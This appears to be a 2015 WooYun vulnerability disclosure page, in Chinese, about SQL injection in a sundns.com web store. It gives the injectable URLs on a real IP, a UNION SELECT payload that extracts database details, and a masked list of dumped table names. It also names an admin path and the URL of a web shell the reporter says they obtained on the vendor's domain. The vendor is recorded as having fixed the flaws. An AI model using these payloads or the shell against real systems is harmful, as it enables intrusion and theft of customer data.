当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117028

漏洞标题:域名商安全之阳光互联某站多处SQL注入(涉及大量数据外送Shell一枚)

相关厂商:sundns.com

漏洞作者: 管管侠

提交时间:2015-05-29 20:46

修复时间:2015-07-07 16:29

公开时间:2015-07-07 16:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-29: 细节已通知厂商并且等待厂商处理中
2015-06-01: 厂商已经确认,细节仅向厂商公开
2015-06-11: 细节向核心白帽子及相关领域专家公开
2015-06-21: 细节向普通白帽子公开
2015-07-01: 细节向实习白帽子公开
2015-07-07: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

sunshine

详细说明:

两处sql注入:
http://61.151.239.168/store/show.php?id=110
http://61.151.239.168/store/cjwtlist.php?id=14
http://61.151.239.168/store/show.php?id=110%20and%201=2%20union%20select%201,user(),3,4,5,database(),version(),8,9,10,11,12,13,14,15,16,17--

3.png


Database: primadb
[423 tables]

mask 区域 
*****----------*****
*****a         *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****LimitEx10 *****
*****10        *****
*****          *****
*****          *****
*****on        *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****1         *****
*****2         *****
*****3         *****
*****4         *****
*****5         *****
*****6         *****
*****7         *****
*****8         *****
*****9         *****
*****0         *****
*****1         *****
*****2         *****
*****1         *****
*****2         *****
*****201       *****
*****3         *****
*****5         *****
*****6         *****
*****9         *****
*****0         *****
*****2         *****
*****1         *****
*****3         *****
*****4         *****
*****5         *****
*****6         *****
*****7         *****
*****8         *****
*****9         *****
*****1         *****
*****2         *****
*****1         *****
*****2         *****
*****3         *****
*****4         *****
*****          *****
*****          *****
*****          *****
*****ins       *****
*****          *****
*****ns        *****
*****          *****
*****          *****
*****704       *****
*****          *****
*****          *****
*****          *****
*****s         *****
*****          *****
*****          *****
*****s         *****
*****          *****
*****es        *****
*****rs        *****
*****          *****
*****          *****
*****words     *****
*****t         *****
*****          *****
*****uid       *****
*****          *****
*****rs        *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****ces       *****
*****cesEx10   *****
*****s         *****
*****s         *****
*****rs        *****
*****          *****
*****s         *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****ances     *****
*****          *****
*****ests      *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****ak        *****
*****          *****
*****2         *****
*****          *****
*****          *****
*****d         *****
*****          *****
*****          *****
*****          *****
*****e         *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****es        *****
*****          *****
*****          *****
*****Requests  *****
*****tes       *****
*****          *****
*****          *****
*****          *****
*****es        *****
*****          *****
*****          *****
*****          *****
*****          *****
*****ions      *****
*****ns        *****
*****          *****
*****          *****
*****          *****
*****s         *****
*****gs        *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****ses       *****
*****          *****
*****nses      *****
*****          *****
*****          *****
*****          *****
*****          *****
*****ns        *****
*****s         *****
*****ps        *****
*****          *****
*****          *****
*****          *****
*****          *****
*****lItems    *****
*****Components*****
*****Prices    *****
*****s         *****
*****          *****
*****onPrices  *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****x         *****
*****xEx10     *****
*****ins       *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****bak       *****
*****1207      *****
*****1208      *****
*****1210      *****
*****1301      *****
*****1304      *****
*****1305      *****
*****1306      *****
*****1307      *****
*****1309      *****
*****1312      *****
*****1401      *****
*****1403      *****
*****1405      *****
*****1412      *****
*****1501      *****
*****1502      *****
*****1503      *****
*****1504      *****
*****Delay     *****
*****Task      *****
*****          *****
*****olicies   *****
*****s         *****
*****ems       *****
*****          *****
*****          *****
*****Exceptions*****
*****s         *****
*****          *****
*****          *****
*****          *****
*****          *****
*****MS        *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****Logs      *****
*****ialogs    *****
*****          *****
*****          *****
*****          *****
*****          *****
*****g         *****
*****          *****
*****g         *****
*****anze      *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****nalItems  *****
*****          *****
*****ls        *****
*****es        *****
*****          *****
*****          *****
*****its       *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****CustomerMa*****
*****s         *****
*****s         *****
*****es        *****
*****          *****
*****s         *****
*****ges       *****
*****ions      *****
*****          *****
*****s         *****
*****          *****
*****cord      *****
*****ions      *****
*****          *****
*****Logs      *****
*****ns        *****
*****ityLogs   *****
*****          *****
*****actions   *****
*****          *****
*****Verify    *****
*****          *****
*****          *****
*****s         *****
*****          *****
*****rTypes    *****
*****rrents    *****
*****s         *****
*****          *****
*****Logs      *****
*****          *****
*****          *****
*****          *****
*****gs        *****
*****gs        *****
*****gs_bak_201*****
*****Bak       *****
*****          *****
*****          *****
*****x10       *****
*****oleOpMaps *****
*****oles      *****
*****          *****
*****10        *****
*****ons       *****
*****          *****
*****          *****
*****aps       *****
*****          *****
*****          *****
*****10        *****
*****ps        *****
*****          *****
*****x10       *****
*****s         *****
*****sEx10     *****
*****Alias     *****
*****AliasEx10 *****
*****Bills     *****
*****Exchanges *****
*****ExchangesE*****
*****MailListNo*****
*****MailListNo*****
*****MailLists *****
*****MailListsE*****
*****Pertains  *****
*****PertainsEx*****
*****s         *****
*****ps        *****
*****ers       *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****rage      *****
*****aps       *****
*****          *****
*****kMaps     *****
*****          *****
*****          *****
*****Maps      *****
*****          *****
*****          *****
*****          *****
*****          *****
*****ps        *****
*****ypeMaps   *****
*****teMaps    *****
*****pportScvmm*****
*****          *****
*****          *****
*****Verify    *****
*****          *****
*****ances     *****
*****          *****
*****s         *****
*****el        *****
*****teBat     *****
*****          *****
*****0         *****
*****Ex10      *****
*****Set       *****
*****SetHistory*****
*****          *****
*****duct      *****
*****          *****
*****n         *****
*****          *****
*****lanMapsEx1*****
*****          *****
*****tInstances*****
*****tStatus   *****
*****tStatusFlo*****
*****tStatusLog*****
*****          *****
*****ns        *****
*****Ex10s     *****
*****stances   *****
*****          *****
*****lanMapsEx1*****
*****s         *****
*****          *****
*****t         *****
*****ceBills   *****
*****          *****
*****ncs       *****
*****ices      *****
*****          *****
*****actions   *****
*****s         *****
*****          *****
*****          *****
*****          *****
*****ICPs      *****
*****atus      *****
*****          *****
*****          *****
*****mon       *****
*****ain       *****
*****nsMap     *****
*****ult_1     *****
*****ult_2     *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****tory      *****
*****          *****
*****          *****
*****          *****
*****cs        *****
*****----------*****

漏洞证明:

1.png


2.png


http://61.151.239.168/admin/
附送shell一枚:
http://cnc.sundns.com/cmd.php

4.png

修复方案:

版权声明:转载请注明来源 管管侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-06-01 10:40

厂商回复:

谢谢提供

最新状态:

2015-07-07:已处理

2015-07-07:已处理